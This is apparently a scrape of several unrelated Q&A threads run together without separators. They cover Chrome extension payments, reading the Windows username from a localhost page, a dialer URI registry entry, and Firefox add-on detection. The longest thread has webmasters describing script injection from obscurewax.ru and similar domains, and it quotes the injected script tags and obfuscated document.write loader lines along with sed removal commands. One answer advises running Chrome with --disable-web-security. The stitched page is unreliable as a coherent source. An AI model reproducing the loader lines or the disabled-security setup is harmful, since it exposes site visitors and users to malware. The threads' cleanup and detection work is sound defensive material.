I am trying to sell my chrome extension. I have the manifest.json, the background.js, popup html and one more js file.
I have researched everywhere to find a way to sell this, but the only source I have found was to include this code:
(function() { var f=this,g=function(a,d){var c=a.split("."),b=window||f;c[0]in b||!b.execScript||b.execScript("var "+c[0]);for(var e;c.length&&(e=c.shift());)c.length||void 0===d?b=b[e]?b[e]:b[e]={}:b[e]=d};var h=function(a){var d=chrome.runtime.connect("nmmhkkegccagdldgiimedpiccmgmieda",{}),c=!1;d.onMessage.addListener(function(b){c=!0;"response"in b&&!("errorType"in b.response)?a.success&&a.success(b):a.failure&&a.failure(b)});d.onDisconnect.addListener(function(){!c&&a.failure&&a.failure({request:{},response:{errorType:"INTERNAL_SERVER_ERROR"}})});d.postMessage(a)};g("google.payments.inapp.buy",function(a){a.method="buy";h(a)});
g("google.payments.inapp.consumePurchase",function(a){a.method="consumePurchase";h(a)});g("google.payments.inapp.getPurchases",function(a){a.method="getPurchases";h(a)});g("google.payments.inapp.getSkuDetails",function(a){a.method="getSkuDetails";h(a)}); })();
...but, they haven't told me where to include it.
Do I include it in a separate js file?
I have created a merchant account, and I cannot find any way to get this to sell. It is already published on the extension chrome store as a free extension, but when I put change the settings to "paid extension" on the chrome store it says it is unavailable.
Is there some secret setting I need to know about?
I have apache installed on a windows laptop that is not connected to the internet. The laptop has multiple user accounts. Let's say that two of the user accounts are "Adam" and "Sally". I have a project on localhost that needs to differentiate between the different Window's users via the Chrome browser.
I understand detecting the username through the browser directly is a gross security sandbox breach, but I don't care: I have complete control of the computer and the project is not web accessible, so there are no security concerns. I'm willing to cheat in any way imaginable including building a custom .exe to help. I just need to differentiate between the different accounts. It doesn't need to be by username, but any alternative ID would need to persist for that given user.
I am asking for outside of the box thinking.
How can I create a page that I can open in Chrome that will say "Hi Adam" or "Hi Sally" or even "Hi -=[GUID]=-" without the visitor ever typing in their name/guid.
You should probably use something like NW.js or Electron instead of chrome for this so you don't have to sacrifice security.
Here's a picture of me running the nw.js sdk and loading just the demo page, bringing up the dev tools and retrieving my username.
Pretty straight forward. Follow node documentation and do whatever you'd like there.
You could have a batch file that runs on startup via the task scheduler or registry in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or Local Group Policy that performs something like echo setCurrentUser("%USERNAME%"); > c:\your_project_directory\set-current-user.js, then you just have a script that defines <script>function setCurrentUser(s) { alert("Hello "+s); /* ... */ }</script> followed by a script import like <script src="set-current-user.js"></script>
If you just want to be able to do whatever in the filesystem, change the shortcut that launches Chrome to --allow-file-access-from-files --user-data-dir=c:\your_project_directory --disable-web-security and restart the PC (or just kill all chrome.exe processes, incl. background).
Edit: Updated with note on using --allow-file-access-from-files from Pritam Banerjee. If you go that route, he gets credit. :)
If you're interested in trying NW.js, here's a full example:
package.json :
{
"name": "nw-hello-user",
"version": "0.0.1",
"main": "index.html"
}
index.html :
<!DOCTYPE html>
<html>
<head>
<title>Hello!</title>
</head>
<body>
Hello <script>document.write(process.env.USERNAME)</script>!
</body>
</html>
Here's the command line:
Here's the end product!
Since you tagged your question with PHP, you could just create a index.php file with the following contents:
Hi <?= getenv("USERNAME") ?>
getenv("USERNAME") returns the the value of the USERNAME environment variable.
Update: Thanks to TylerY86 for providing the more correct way to get the username. Also note from his comment below:
You also have to be sure that the Apache instance is running in the
context of the user, and not as a service. If you try the example, if
you get something like SYSTEM or IUSR_MACHINE instead of the user
name, you'll need to adjust.
You have 2 choices, as far as I see.
1) you may ask users to identify themself first time they use the page and store it to the local storage. Since those are different users on the machine, their localStorages should be separate.
2) You may deploy a small web service on the local host, that gets the user credentials from the system and returns on GET request.
I am actually around the internet development for quite a while now - but I never had to do the following and have no idea how to solve it:
Our computers have connected Telephones which are used with the Dialer.exe.
As I am working on an internal Clientdatabase in our network I would like to support the feature of clicking a "link" == telephonnumber in the browser in our database -> that click should execute the following task : open dialer.exe on users C:// , paste in telephonenumber in numberfield.
Thank you for your help.
That should be possible by adapting a Costum-URI-Sheme to your needs. See here:
https://msdn.microsoft.com/en-us/library/aa767914%28v=vs.85%29.aspx
Problematic is that this solution is yet Windows only and that you need to set registry-entries on every machine. Probably those values are applicable with an appropriate infrastructure but if there's not domain existent this could be a horrendous amount of work...
Edit:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\telephone]
#="URL:Telephone Dialer"
"URL Protocol"=""
[HKEY_CLASSES_ROOT\telephone\DefaultIcon]
#="\"C:\\Windows\\System32\\dialer.exe\",1"
[HKEY_CLASSES_ROOT\telephone\shell]
"URL Protocol"=""
[HKEY_CLASSES_ROOT\telephone\shell\open]
[HKEY_CLASSES_ROOT\telephone\shell\open\command]
#="\"C:\\Windows\\System32\\dialer.exe\" \"%1\""
Here it is described how to check if Firebug is installed by checking if an image of firebug exists: http://webdevwonders.com/detecting-firefox-add-ons/
But it seems to be a bit outdated, cause the images he uses there don't exist anymore in firebug.
the firebug chrome.manifest looks like:
content firebug content/firebug/ contentaccessible=yes
...
but in the whole addon I only find one png now, and that is placed in the rootfolder of the addon. But some other content is accessible, for example: chrome://firebug/content/trace.js
Ho
So, in gerneral:
How do I make an image accessible that resides inside a Firefox SDK Addon?
I program an Addon and I want to make an image ok.png available to all javascripts in Firefox.
I added the image in the data folder and added a chrome.manifest
content response-timeout-24-hours data/
content response-timeout-24-hours data/ contentaccessible=yes
But no way to call it via a URL like
chrome://response-timeout-24-hours/data/ok.png
How do the paths belong together? which is relative to which?
I created a Bug report here.
So if you want to make your add-on detectable you need another approach:
you can use a PageMod to attach a content script that would wait for a
message from your web-app and "respond" by sending another message
back to your app. you would know that if you don't receive the
response, your addon is not installed. check out the documentation for
more details:
https://developer.mozilla.org/en-US/Add-ons/SDK/High-Level_APIs/page-mod
I used this to make my add-on detectable.
i have following code added automatically into my script...
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js"></script>
<!--72628eb2e686638651ad69b6a34a630f-->
at the end of my each page when i see source code of my page it shows me the above code but when i open that file in notepad or any editing software it shows me nothing but only my script.. how can i remove that script from all of my files at once...
also let me know why it is happening so far..
Edit 25-Aug :
Specific Domains & entries added(below)
New domain nuttypiano.com spotted.
Edit :
Figured it out. it was definitely Filezilla siphoning of my FTP passwords.
Keep an eye on .htaccess file and file permission -- they seem to change to 777.
Happened to me as well. It took all the passwords from the FTP program and then changed the PHP and js files to add the line
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
Mainly index.* files are targeted other files targeted are *.js files.
I believe the end js file name varies but you can track it from the obscurewax.ru domain.
I have around 8-10 websites where this has happened. Most of my websites are running joomla.
In what I have observed as yet, It likes to target the files that start with the word
index.
In a joomla install, there were about 122 files affected by this, almost all were in the :
joomla_install/administrator
folder.
Its a pain to download a joomla install from the server because its somewhere about 4-5 thousand files. Still, the strategy I am following is this.
Download the entire site on a folder, run a text search(I am using TextCrawler) for :
obscurewax.ru
Note the number of files and folders that have this and more importantly note all the the variations of the js file names.
Do a search and replace for all the .js file variations eg :
<script type="text/javascript" src="http://obscurewax.ru/Queue.js">
<script type="text/javascript" src="http://obscurewax.ru/Cablemodem.js">
<script type="text/javascript" src="http://obscurewax.ru/Kilobyte.js">
In the .js files you will also find this type of code :
document.write('<s'+'cript type="text/javascript"
src="http://obscurewax.ru/AGP.js"></scr'+'ipt>'); // Found in .js files
Replace all with nothing ('').
Another thing you can do is : obscurewax.ru with example.com
I don't have a quick and easy way to remove the code in the comments below it(which I think they are using for tracking purposes.) -- but I think if you remove the script link, that comment is not going to hurt you.
Different domains spotted :
nuttypiano.com(spotted 25-Aug)
pocketbloke.ru
yumeye.ru
microlightning.ru
riotassistance.ru
// Denis125 <webmaster#atlant.ru> (comment in a .js file.)
Specific lines to lookout for :
<script type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></script>
<script type="text/javascript" src="http://riotassistance.ru/Undo.js"></script>
* Contributed by Open Web Technologies <http://openwebtech.ru/>
Denis125 <webmaster#atlant.ru>
// Author: Andrei Blagorazumov, a#fnr.ru
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Undo.js"></scri'+'pt>');
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Beta_Software.js"></scr'+'ipt>');
<script type="text/javascript" src="http://nuttypiano.com/Hard_Copy.js"></script>
<script type="text/javascript" src="http://nuttypiano.com/Facebook.js"></script>
document.write('<s'+'cript type="text/javascript" src="http://nuttypiano.com/Facebook.js"></scri'+'pt>');
Note : Sometimes you will not be able to see this link in your html in the source, but, the files gets loaded because its hiding in one of the JavaScripts. A good way to be sure you are really clean is to actually go in and see the .js files that are getting loaded while your page is loading and check if any .js files are loading from the suspected domain. An easy way to do this is go into the developer tools in chrome(ctrl + shift + i)
Here in the resources tab you will see the scripts filter, using this you can track all the .js files loading while your page loads. The firebug plugin in firefox will also let you see this info. If your website has several parts(front-end, back-end) you want to visit all the parts of the website and check if any suspicious .js files are getting loaded.
Very importantly
Update your Antivirus scanner and do a full scan on your computer for viruses.
If you are using an FTP program or your code editor has FTP capability you want to visit all the websites for which you have passwords stored and check if they were affected. If your FTP program/editor was compromised -- almost all the websites that you have ftp passwords stored for would have been affected.
Change the passwords for all the ftp accounts that were stored in the programs.
Uninstall the suspect program & use another one or re-download and install it.
This is the worst thing that can happen to a web-developer. This attack is generally done by tricking the victim(you and me) to believe there is an update for the FTP program from within the program, as soon as you install the update -- your sites will get affected.
I am working on this thing right now. If you have any better/shorter ways of doing this. Please share. Thanks!
I have a clients site that got hacked with line of code from obscurewax.ru. The site is hosted on GoDaddy shared hosting. It looks like they edited multiple files yesterday on the server.
We are not sure how they entered the website but they did crash the website. We are right now going in and deleting everything in start over as we are unsure of where they left files to start over.
They left this line of code - obscurewax.ru/Heat_Sink.js
Which does nothing, but I am not taking any chances. According to whois, the domain was purchased just three days ago and the info is private. If it was the hosting provider it would be public. Its being hosted in Russia and on US websites, I see that as a red flag. I think they are building their network and will activate the scripts once they have a big enough footprint.
Hope that helps.
Who is your hosting provider? Some hosts do insert code (normally ad banners for free sites, but not always) to your web page on-the-fly. If you do have such a host, I recommend getting a different one.
Never attribute to a virus what may be due to a free webhost ;)
Is that actually the URL of the script being inserted in your pages? Because that's an empty file.
Hmmm.. It seems that it is proftpd 0day.
Pair of clients reported the problem on their sites.
There was proftpd 1.3.1 installed on the server.
Regarding log files attackers were bruteforcing only login names, not passwords.
After successful guessing the login name(regarding site's domain name, for example) they hadn't any problem to login...
Bad thing, I hope upgrading to 1.3.3 will fix it.
If you are running linux server here is 2 fast console snippets to fix sites after obscurewax attack:
cd /to/site/webroot
find ./ -type f -exec sed -i "s/document.write('<s'+'cript type=\"text\/javascript\" src=\"http:\/\/obscurewax.ru\/Google.js\"><\/scr'+'ipt>')//g" {} \
find ./ -type f -exec sed -i 's/<script type="text\/javascript" src="http:\/\/obscurewax.ru\/Google.js"><\/script>//g' {} \;
Don't forget to replace Google.js with your variant of attacker's link.
UPDATE
The proftpd is clean. After some investigation I've found the real reason and it is just prosaic. One of the leading hosting manager was keeping the login/passwords of many ftp users in his Filezilla on the Windows Desktop. All the passwords that he kept was stolen by a third party.
I got the same problem on my website. They altered all .js files and added that line of code at the end.
The problem is that i can't find how they did it.
Could this be any components/plugins that is not updated perhaps?
How about we make a list of our components to see if we have some that are the same and maybee the curse of this hack?
My list is: (components)
Attachments
Banners Enabled 1.5.0 April 2006 Joomla! Project
CSV Improved Enabled 1.7 22 May 2009 RolandD Cyber Produksi
CSVI VirtueMart Enabled 2.0.1 28 November 2009 RolandD Cyber Produksi
docman Enabled 1.4.0.stable February 2009 Joomlatools
Easy Search Enabled 0.1.0 November 2008 Hiro Nozu
easysql Enabled 1.27 30/11/2006 Serebro
FrontpagePlus Disabled 0.1.0 January 2009 NoNumber! (Peter van Westen)
gk3_tabs_manager Disabled 3.0.2 31/05/2009 Gavick.com
JCE Enabled 157 23 June 2009 Ryan Demmer
JCrawler Enabled 1.7 Beta 20/4/2009 Patrick Winkler
JoomlaPack Enabled 2.4 2009-12-05 JoomlaPack Developers
K2 Enabled 2.1 September 9th, 2009 JoomlaWorks
Linkr Enabled 2.3.6 April 2008 Frank
Newsfeeds Enabled 1.5.0 April 2006 Joomla! Project
Polls Enabled 1.5.0 July 2004 Joomla! Project
Nova Enabled 1.7.5 February 2010 ProJoom
pjinstaller Enabled 1.0.8 January 2010 ProJoom
QContacts Disabled 1.0.3 July 2008 Massimo Giagnoni
QuickFAQ Enabled 1.0.3 01/02/2009 Christoph Lukes
redlinker Enabled 1.0b11 09/09/2009 Redweb.dk
redVMPRODUCTFINDER Enabled 1.10 21/01/2010 Redweb.dk
RokCandy Disabled 0.82a January 31, 2009 RocketWerx, LLC
RokModule Enabled 1.1 June 2008 RocketTheme
forme Enabled 1.0.4 07/02/2008 www.rsjoomla.com
RSform Enabled 1.2.0 17/06/2009 www.rsjoomla.com
rsinstaller Enabled 1.0.0 04/06/2009 www.rsjoomla.com
sh404sef Enabled 1.0.16_Beta Jan 2, 2009 Yannick Gaultier
VirtueMart Enabled 1.1.4 16.10.2009 The VirtueMart Development Team
vmemails Enabled 1.0.4b182 2009-11-28 InteraMind Advanced Analytics
Weblinks Enabled 1.5.0 April 2006 Joomla! Project
Xmap
Note: 2 month ago I did a complete cleanup of my pc, changed all passwords on the server and website. This only worked until now where the virus is back, so my very good guess is that it's a component, module, plugin that is during the damage. Yes, you can do all the virus clean up you want, but the issue will return!
I just stumbled on this; oops, it is quite a recent incident here. I thought that my site was the only one. I noticed that this script was always loading whenever I accessed my site; I was running a CMS but now I have shut it down. As for the suggestion of the vulnerability within FTP, count me out of this since I have never used FTP. I simply shut down the CMS section because even after running a fresh install of the latest release of the CMS another malicious script was still loading while accessing the site. That made me come to the conclusion that my web host's servers may have been compromised already. Other malicious scripts that had attacked my CMS include:
pocketbloke.ru
yumeye.ru, and
microlightning.ru
P.S: My .htaccess file was also altered and the file permissions to my CMS were all turned to 777. Could this be a cPanel vulnerability being exploited by these hackers?
Start with changing FTP or any other remote access passwords and check your computer/server for viruses. Something/someone is adding this automatically to all your files. Then you can use any mass-text-replacement tool like http://tools.tortoisesvn.net/grepWin to find that line in all files and remove them (by replacing with empty line).
UPDATE
I missed your line about that you don't see that line in your files source. Just check the rest of the file and check all JS files - they should include small portion of minified code which adds that line. You can also try to search all your files locally or by using any browsers developer tools to find where same URL or part of is mentioned.
Weird. I got the same thing in one of my clients index.html with a bunch of other mysterious files. Perhaps they got into his FTP. of my 50 other clients, noone else was effected it seems.
Upon inspection random users have been been able to access the FTP for a while. here was the unique list of IPs that I know aren't the owner's
137.149.150.100
173.35.246.173
174.143.242.47
188.229.31.45
188.24.43.62
188.25.239.153
188.25.73.186
189.28.154.133
198.145.116.71
198.63.210.170
203.81.55.153
208.101.102.60
209.239.120.50
212.189.180.1
213.142.137.131
217.27.224.7
68.45.8.194
69.143.233.198
70.38.11.176
70.81.249.108
74.58.67.48
76.104.123.11
78.159.45.198
78.245.136.34
78.251.215.23
78.94.44.177
79.112.216.109
79.114.26.35
79.117.237.130
79.136.32.209
81.66.237.244
81.82.154.174
81.82.52.12
82.234.154.97
82.247.130.26
82.36.17.105
83.84.225.144
84.196.204.172
85.136.145.183
85.139.199.26
85.28.76.190
86.60.215.133
87.244.217.188
87.247.251.44
87.59.67.145
88.162.127.32
88.207.7.151
89.114.92.59
89.46.96.87
89.47.179.66
91.147.207.215
91.65.157.38
92.249.196.99
94.141.145.147
94.227.112.143
95.79.22.165
99.226.133.161
Looks like some sort of mass attack. I would look at the timestamp on the files that were modified, see if any are close or if any of your other ftp people have logged in with those IPs. Just to note I am running debian linux server with proftpd...
I got a weird error message when trying to edit the file in winSCP using notepad2...so it looks like whatever code it is, messing up typical text editors. I was able to nano the file and delete the links though.
PS: I was made aware of this when google emailed me "Dear site owner or webmaster of [censored].com,
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com."
Detected same problem today. I deleted all strings from js manually.
They getting smarter.
My string was:
document.write('<s'+'cript type="text/javascript" src="http://obscurewax.ru/Scroll_Wheel.js"></scr'+'ipt>');
Malware infects a PC with stored ftp passwords. It then automatically takes the passwords and logs in and infects the website. Look for 2 recently modified files in c:\windows\system32\drivers
They are probably the culprits.
Here is the script found on my website by Google. Google had blocked my site because of "Malware"
I was trying "Word Press" and a theme, that I paid for, "The Local". This, in my opinion, is the only path that this script could have been added. I removed all scripts of Word Press and The Local, and now Google does not detect Malware on my site.
My solution was deletion of all the scripts that I mentioned and replace everything with standard HTML. The other scripts were mostly all PHP, and I find HTML to be much more stable.
Good Luck